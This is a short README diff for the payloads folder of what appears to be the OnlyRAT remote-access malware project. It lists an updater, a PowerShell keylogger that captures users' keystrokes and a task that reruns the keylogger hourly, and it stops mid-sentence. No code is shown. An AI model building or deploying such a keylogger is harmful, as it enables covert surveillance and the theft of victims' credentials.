CosmodiumCS/MK01-OnlyRAT/payloads/README.md

 # update.sh
 A file used by our `main.py` file in order to check for updates and update the OnlyRAT malware.

+# keylogger.ps1
+A powershell keylogger that can log the keystrokes that user is typing.

+# schedule.ps1
+This runs the keylogger on an hourly basis to ensure we can receive

+# controller.cmd